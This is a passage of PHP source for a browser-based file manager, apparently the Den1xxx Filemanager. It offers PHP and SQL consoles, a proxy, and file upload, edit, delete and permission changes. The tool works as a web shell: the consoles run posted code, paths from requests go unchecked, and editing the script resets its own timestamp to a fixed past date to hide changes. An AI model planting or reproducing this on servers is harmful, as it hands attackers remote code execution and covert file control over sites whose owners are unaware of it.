	  	  $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
            
	  	  echo $result;

	  	  die();

	  } 
}
         
?>
<!doctype html>

<html>
<head>     
	  <meta charset="utf-8" />
       
	  <meta name="viewport" content="width=device-width, initial-scale=1" />

    <title><?=__('File manager')?></title>
<style>

body {
         
	  background-color:	  white;
           
	  font-family:	  	  Verdana, Arial, Helvetica, sans-serif;
        
	  font-size:	  	  	  8pt;
        
	  margin:	  	  	  	  0px;

}



a:link, a:active, a:visited { color: #006699; text-decoration: none; }
        
a:hover { color: #DD6900; text-decoration: underline; }

a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }

a.th:hover {  color: #FFA34F; text-decoration: underline; }
         


table.bg {
         
	  background-color: #ACBBC6

}



th, td { 

	  font:	  normal 8pt Verdana, Arial, Helvetica, sans-serif;
	  padding: 3px;
        
}

         
th	  {

	  height:	  	  	  	  25px;

	  background-color:	  #006699;
       
	  color:	  	  	  	  #FFA34F;

	  font-weight:	  	  bold;
	  font-size:	  	  	  11px;
}
         

.row1 {

	  background-color:	  #EFEFEF;
}



.row2 {
           
	  background-color:	  #DEE3E7;

}

         
.row3 {

	  background-color:	  #D1D7DC;

	  padding: 5px;

}
           

           
tr.row1:hover {

	  background-color:	  #F3FCFC;

}



tr.row2:hover {

	  background-color:	  #F0F6F6;

}
        

.whole {

	  width: 100%;
           
}



.all tbody td:first-child{width:100%;}



textarea {

	  font: 9pt 'Courier New', courier;
           
	  line-height: 125%;

	  padding: 5px;

}

            
.textarea_input {

	  height: 1em;
           
}
       

        
.textarea_input:focus {
        
	  height: auto;

}


input[type=submit]{
	  background: #FCFCFC none !important;

	  cursor: pointer;
          
}



.folder {
           
    background-image: url("");
}


.file {

    background-image: url("");

}
<?=fm_home_style()?>
.img {
	  background-image: 

url("");
         
}

@media screen and (max-width:720px){

  table{display:block;}
       
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
        
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}

    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}

	  #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}

	  #header_table table td {display:inline;float:left;}
           
}
            
</style>

</head>
<body>

<?php

$url_inc = '?fm=true';

if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
       
	  $res = empty($_POST['sql']) ? '' : $_POST['sql'];
	  $res_lng = 'sql';
        
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
            
	  $res = empty($_POST['php']) ? '' : $_POST['php'];

	  $res_lng = 'php';
          
} 
            
if (isset($_GET['fm_settings'])) {

	  echo ' 

<table class="whole">

<form method="post" action="">

<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>

'.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'

'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
            
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
       
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'

'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
            
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
       
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
            
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'

'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'

'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'

<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>

<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>

<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>

<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>

'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'

<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>

</form>

</table>
<table>

<form method="post" action="">
            
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
           
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>

<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
        
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>

<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
       
</form>
            
</table>';

echo fm_tpl_form('php'),fm_tpl_form('sql');

} elseif (isset($proxy_form)) {
         
	  die($proxy_form);
} elseif (isset($res_lng)) {	  

?>

<table class="whole">

<tr>
    <th><?=__('File manager').' - '.$path_share?></th>

</tr>
<tr>
           
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
	  if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');

	  else echo '</h2></td><td>'.fm_run_input('sql');
        
	  ?></td></tr></table></td>

</tr>
          
<tr>
           
    <td class="row1">
          
	  	  <a href="<?=$url_inc.'&path=' . $path_share;?>"><?=__('Back')?></a>
	  	  <form action="" method="POST" name="console">

	  	  <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>

	  	  <input type="reset" value="<?=__('Reset')?>">

	  	  <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">

<?php

$str_tmpl = $res_lng.'_templates';
           
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
          
if (!empty($tmpl)){
       
	  $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';

	  $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";

	  $select .= '<option value="-1">' . __('Select') . "</option>\n";

	  foreach ($tmpl as $key=>$value){

	  	  $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
        
	  }

	  $select .= "</select>\n";
        
	  echo $select;
           
}

?>

	  	  </form>
	  </td>
        
</tr>
</table>

<?php

	  if (!empty($res)) {
        
	  	  $fun='fm_'.$res_lng;
	  	  echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
          
	  }
          
} elseif (!empty($_REQUEST['edit'])){

	  if(!empty($_REQUEST['save'])) {
            
	  	  $fn = $path_share . $_REQUEST['edit'];
          
	  	  $filemtime = filemtime($fn);
	      if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated');

	  	  else $msg .= __('Error occurred');
	  	  if ($_GET['edit']==basename(__FILE__)) {
       
	  	  	  touch(__FILE__,1415116371);
         
	  	  } else {

	  	  	  if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
	  	  }

	  }
    $oldcontent = @file_get_contents($path_share . $_REQUEST['edit']);

    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path_share;
    $backlink = $url_inc . '&path=' . $path_share;

?>

<table border='0' cellspacing='0' cellpadding='1' width="100%">
         
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path_share.$_REQUEST['edit']?></th>
</tr>

<tr>
    <td class="row1">
        
        <?=$msg?>

	  </td>

</tr>
         
<tr>

    <td class="row1">

        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	  </td>
</tr>

<tr>

    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">

            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
         
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">

        </form>
    </td>
         
</tr>

</table>
            
<?php

echo $auth['script'];
          
} elseif(!empty($_REQUEST['rights'])){

	  if(!empty($_REQUEST['save'])) {
	      if(fm_chmod($path_share . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))

	  	  $msg .= (__('File updated')); 
	  	  else $msg .= (__('Error occurred'));
	  }
	  clearstatcache();

    $oldrights = fm_rights_string($path_share . $_REQUEST['rights'], true);

    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path_share;
    $backlink = $url_inc . '&path=' . $path_share;

?>
<table class="whole">
<tr>

    <th><?=__('File manager').' - '.$path_share?></th>
          
</tr>
            
<tr>

    <td class="row1">

        <?=$msg?>

	  </td>
         
</tr>

<tr>

    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	  </td>
</tr>

<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">

           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">

        <?php if (is_dir($path_share.$_REQUEST['rights'])) { ?>

            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>

        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">

        </form>

    </td>
</tr>

</table>
           
<?php

} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	  if(!empty($_REQUEST['save'])) {
        
	      rename($path_share . $_REQUEST['rename'], $path_share . $_REQUEST['newname']);
        
	  	  $msg .= (__('File updated'));

	  	  $_REQUEST['rename'] = $_REQUEST['newname'];

	  }

	  clearstatcache();
            
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path_share;
    $backlink = $url_inc . '&path=' . $path_share;



?>

<table class="whole">

<tr>
            
    <th><?=__('File manager').' - '.$path_share?></th>

</tr>

<tr>
    <td class="row1">
        <?=$msg?>
	  </td>
</tr>

<tr>

    <td class="row1">

        <a href="<?=$backlink?>"><?=__('Back')?></a>
            
	  </td>

</tr>
          
<tr>
    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">
            
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
           
            <input type="submit" name="save" value="<?=__('Submit')?>">

        </form>

    </td>

</tr>

</table>

<?php
            
} else {

//Let's rock!
        
    $msg = '';
         
    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){

            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path_share . $_FILES['upload']['name'])){

                $msg .= __('Error occurred');

            } else {

	  	  	  	  $msg .= __('Files uploaded').': '.$_FILES['upload']['name'];
           
	  	  	  }

        }

    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {

        if(!fm_del_dateien(($path_share . $_REQUEST['delete']), true)) {
           
            $msg .= __('Error occurred');

        } else {
	  	  	  $msg .= __('Deleted').' '.$_REQUEST['delete'];
         
	  	  }

	  } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path_share . $_REQUEST['dirname'],0777)) {

            $msg .= __('Error occurred');

        } else {
	  	  	  $msg .= __('Created').' '.$_REQUEST['dirname'];

	  	  }
          
    } elseif(!empty($_POST['search_recursive'])) {

	  	  ini_set('max_execution_time', '0');
        
	  	  $search_data =  find_text_in_dateien($_POST['path'], $_POST['mask'], $_POST['search_recursive']);

	  	  if(!empty($search_data)) {
	  	  	  $msg .= __('Found in dateien').' ('.count($search_data).'):<br>';

	  	  	  foreach ($search_data as $filename) {
	  	  	  	  $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

	  	  	  }

	  	  } else {
         
	  	  	  $msg .= __('Nothing founded');

	  	  }	  
	  } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
          
        if(!$fp=@fopen($path_share . $_REQUEST['filename'],"w")) {

            $msg .= __('Error occurred');

        } else {

	  	  	  fclose($fp);

	  	  	  $msg .= __('Created').' '.$_REQUEST['filename'];
            
	  	  }

    } elseif (isset($_GET['zip'])) {

	  	  $source = base64_decode($_GET['zip']);
	  	  $destination = basename($source).'.zip';
          
	  	  set_time_limit(0);

	  	  $phar = new PharData($destination);
         
	  	  $phar->buildFromDirectory($source);
	  	  if (is_file($destination))
	  	  $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
       
	  	  '.&nbsp;'.fm_link('download',$path_share.$destination,__('Download'),__('Download').' '. $destination)

	  	  .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path_share.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';

	  	  else $msg .= __('Error occurred').': '.__('no dateien');

	  } elseif (isset($_GET['gz'])) {
	  	  $source = base64_decode($_GET['gz']);
            
	  	  $archive = $source.'.tar';

	  	  $destination = basename($source).'.tar';

	  	  if (is_file($archive)) unlink($archive);

	  	  if (is_file($archive.'.gz')) unlink($archive.'.gz');
	  	  clearstatcache();

	  	  set_time_limit(0);
         
	  	  //die();

	  	  $phar = new PharData($destination);
       
	  	  $phar->buildFromDirectory($source);

	  	  $phar->compress(Phar::GZ,'.tar.gz');
	  	  unset($phar);
          
	  	  if (is_file($archive)) {

	  	  	  if (is_file($archive.'.gz')) {

	  	  	  	  unlink($archive); 

	  	  	  	  $destination .= '.gz';
            
	  	  	  }
          

	  	  	  $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
         
	  	  	  '.&nbsp;'.fm_link('download',$path_share.$destination,__('Download'),__('Download').' '. $destination)
	  	  	  .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path_share.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
	  	  } else $msg .= __('Error occurred').': '.__('no dateien');

	  } elseif (isset($_GET['decompress'])) {

	  	  // $source = base64_decode($_GET['decompress']);
        
	  	  // $destination = basename($source);

	  	  // $ext = end(explode(".", $destination));
	  	  // if ($ext=='zip' OR $ext=='gz') {
           
	  	  	  // $phar = new PharData($source);
            
	  	  	  // $phar->decompress();
            
	  	  	  // $base_file = str_replace('.'.$ext,'',$destination);

	  	  	  // $ext = end(explode(".", $base_file));

	  	  	  // if ($ext=='tar'){

	  	  	  	  // $phar = new PharData($base_file);

	  	  	  	  // $phar->extractTo(dir($source));
	  	  	  // }
	  	  // } 

	  	  // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	  } elseif (isset($_GET['gzfile'])) {
           
	  	  $source = base64_decode($_GET['gzfile']);
	  	  $archive = $source.'.tar';

	  	  $destination = basename($source).'.tar';
            
	  	  if (is_file($archive)) unlink($archive);

	  	  if (is_file($archive.'.gz')) unlink($archive.'.gz');
            
	  	  set_time_limit(0);
	  	  //echo $destination;

	  	  $ext_arr = explode('.',basename($source));
	  	  if (isset($ext_arr[1])) {
       
	  	  	  unset($ext_arr[0]);

	  	  	  $ext=implode('.',$ext_arr);
           
	  	  } 
        
	  	  $phar = new PharData($destination);
          
	  	  $phar->addFile($source);
	  	  $phar->compress(Phar::GZ,$ext.'.tar.gz');

	  	  unset($phar);
          
	  	  if (is_file($archive)) {
	  	  	  if (is_file($archive.'.gz')) {
	  	  	  	  unlink($archive); 
	  	  	  	  $destination .= '.gz';

	  	  	  }
          
	  	  	  $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
	  	  	  '.&nbsp;'.fm_link('download',$path_share.$destination,__('Download'),__('Download').' '. $destination)

	  	  	  .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path_share.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
	  	  } else $msg .= __('Error occurred').': '.__('no dateien');

	  }
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path_share)?' - '.$path_share:'')?></th>

</tr>
<?php if(!empty($msg)){ ?>

<tr>

	  <td colspan="2" class="row2"><?=$msg?></td>
        
</tr>

<?php } ?>

<tr>
    <td class="row2">

	  	  <table>
       
	  	  	  <tr>
            
	  	  	  <td>
	  	  	  	  <?=fm_home()?>
	  	  	  </td>
	  	  	  <td>
	  	  	  <?php if(!empty($fm_config['make_directory'])) { ?>
        
	  	  	  	  <form method="post" action="<?=$url_inc?>">
	  	  	  	  <input type="hidden" name="path" value="<?=$path_share?>" />
            
	  	  	  	  <input type="text" name="dirname" size="15">

	  	  	  	  <input type="submit" name="mkdir" value="<?=__('Make directory')?>">

	  	  	  	  </form>

	  	  	  <?php } ?>
	  	  	  </td>

	  	  	  <td>

	  	  	  <?php if(!empty($fm_config['new_file'])) { ?>

	  	  	  	  <form method="post" action="<?=$url_inc?>">

	  	  	  	  <input type="hidden" name="path"     value="<?=$path_share?>" />

	  	  	  	  <input type="text"   name="filename" size="15">
	  	  	  	  <input type="submit" name="mkfile"   value="<?=__('New file')?>">
	  	  	  	  </form>
           
	  	  	  <?php } ?>

	  	  	  </td>

	  	  	  <td>

	  	  	  	  <form  method="post" action="<?=$url_inc?>" style="display:inline">
           
	  	  	  	  <input type="hidden" name="path" value="<?=$path_share?>" />
	  	  	  	  <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
	  	  	  	  <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">

	  	  	  	  <input type="submit" name="search" value="<?=__('Search')?>">

	  	  	  	  </form>
            
	  	  	  </td>
            
	  	  	  <td>
        
	  	  	  <?=fm_run_input('php')?>

	  	  	  </td>
            
	  	  	  <td>
	  	  	  <?=fm_run_input('sql')?>
         
	  	  	  </td>

	  	  	  </tr>
	  	  </table>

    </td>

    <td class="row3">

	  	  <table>

	  	  <tr>

	  	  <td>

	  	  <?php if (!empty($fm_config['upload_file'])) { ?>

	  	  	  <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
	  	  	  <input type="hidden" name="path" value="<?=$path_share?>" />

	  	  	  <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
	  	  	  <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />

	  	  	  <input type="submit" name="test" value="<?=__('Upload')?>" />
	  	  	  </form>

	  	  <?php } ?>
            
	  	  </td>
            
	  	  <td>
           
	  	  <?php if ($auth['authorize']) { ?>
	  	  	  <form action="" method="post">&nbsp;&nbsp;&nbsp;
         
	  	  	  <input name="quit" type="hidden" value="1">
          
	  	  	  <?=__('Hello')?>, <?=$auth['login']?>

	  	  	  <input type="submit" value="<?=__('Quit')?>">

	  	  	  </form>

	  	  <?php } ?>

	  	  </td>

	  	  <td>
	  	  <?=fm_lang_form($language)?>

	  	  </td>
	  	  <tr>

	  	  </table>

    </td>
       
</tr>
           
</table>

<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
           
<thead>

<tr> 

    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>

    <th style="white-space:nowrap"> <?=__('Date')?> </th>

    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
          
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>

</tr>

</thead>
<tbody>

<?php
       
$elements = fm_scan_dir($path_share, '', 'all', true);

$dirs = array();

$dateien = array();
foreach ($elements as $file){

    if(@is_dir($path_share . $file)){
        $dirs[] = $file;

    } else {

        $dateien[] = $file;
         
    }

}
       
natsort($dirs); natsort($dateien);
$elements = array_merge($dirs, $dateien);



foreach ($elements as $file){

    $filename = $path_share . $file;
    $filedata = @stat($filename);

    if(@is_dir($filename)){

	  	  $filedata[7] = '';
        
	  	  if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path_share.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';

        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
	  	  $arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
           
        $style = 'row2';

	  	   if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path_share  . '\'"'; else $alert = '';

    } else {

	  	  $link = 
	  	  	  $fm_config['show_img']&&@getimagesize($filename) 

	  	  	  ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
	  	  	  . fm_img_link($filename)

	  	  	  .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'

	  	  	  : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path_share. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';

	  	  $e_arr = explode(".", $file);

	  	  $ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);

	  	  $arlink = in_array($ext,array('zip','gz','tar')) 
	  	  ? ''
          
	  	  : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
           
        $style = 'row1';
            
	  	  $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path_share  . '\'"';

    }

    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path_share . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';

    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path_share . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';

?>
<tr class="<?=$style?>"> 

    <td><?=$link?></td>

    <td><?=$filedata[7]?></td>
         
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
       
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>

    <td><?=$renamelink?></td>

    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
          
<?php
    }
}
           
?>
</tbody>
</table>
<div class="row3"><?php
       
	  $mtime = explode(' ', microtime()); 

	  $totaltime = $mtime[0] + $mtime[1] - $starttime; 

	  echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';

	  if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	  if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	  if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);

	  if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';

	  if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';

	  if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
           
	  if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';

	  ?>
</div>

<script type="text/javascript">

function download_xls(filename, text) {
        
	  var element = document.createElement('a');

	  element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);

	  element.setAttribute('download', filename);
          
	  element.style.display = 'none';
       
	  document.body.appendChild(element);

	  element.click();

	  document.body.removeChild(element);
}


        
function base64_encode(m) {

	  for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
	  	  c = m.charCodeAt(l);
          
	  	  if (128 > c) d = 1;

	  	  else
           
	  	  	  for (d = 2; c >= 2 << 5 * d;) ++d;

	  	  for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
          
	  }

	  b && (g += k[f << 6 - b]);
            
	  return g
           
}



var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',

    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',

    format = function(s, c) {

            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];

            })

        }

    return function(table, name) {
        
        if (!table.nodeType) table = document.getElementById(table)
          
        var ctx = {
            
            worksheet: name || 'Worksheet',

            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
        
	  	  t = new Date();
        
	  	  filename = 'fm_' + t.toISOString() + '.xls'

	  	  download_xls(filename, base64_encode(format(template, ctx)))

    }

})();

          
var table2Excel = function () {


    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");



	  this.CreateExcelSheet = 

	  	  function(el, name){
           
	  	  	  if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer



	  	  	  	  var x = document.getElementById(el).rows;



	  	  	  	  var xls = new ActiveXObject("Excel.Application");



	  	  	  	  xls.visible = true;

	  	  	  	  xls.Workbooks.Add
	  	  	  	  for (i = 0; i < x.length; i++) {

	  	  	  	  	  var y = x[i].cells;


	  	  	  	  	  for (j = 0; j < y.length; j++) {
           
	  	  	  	  	  	  xls.Cells(i + 1, j + 1).Value = y[j].innerText;
          
	  	  	  	  	  }

	  	  	  	  }
	  	  	  	  xls.Visible = true;
	  	  	  	  xls.UserControl = true;

	  	  	  	  return xls;
	  	  	  } else {
       
	  	  	  	  tableToExcelData(el, name);
	  	  	  }
	  	  }

}

</script>

</body>
</html>

       
<?php
//Ported from ReloadCMS project http://reloadcms.com
         
class archiveTar {
	  var $archiv_name = '';
	  var $temporare_datei = 0;

	  var $datei_position = 0;

	  var $ist_gzip = true;

	  var $fehler = array();

	  var $dateien = array();
        
	  
        
	  function __construct(){

	  	  if (!isset($this->fehler)) $this->fehler = array();

	  }

	  
            
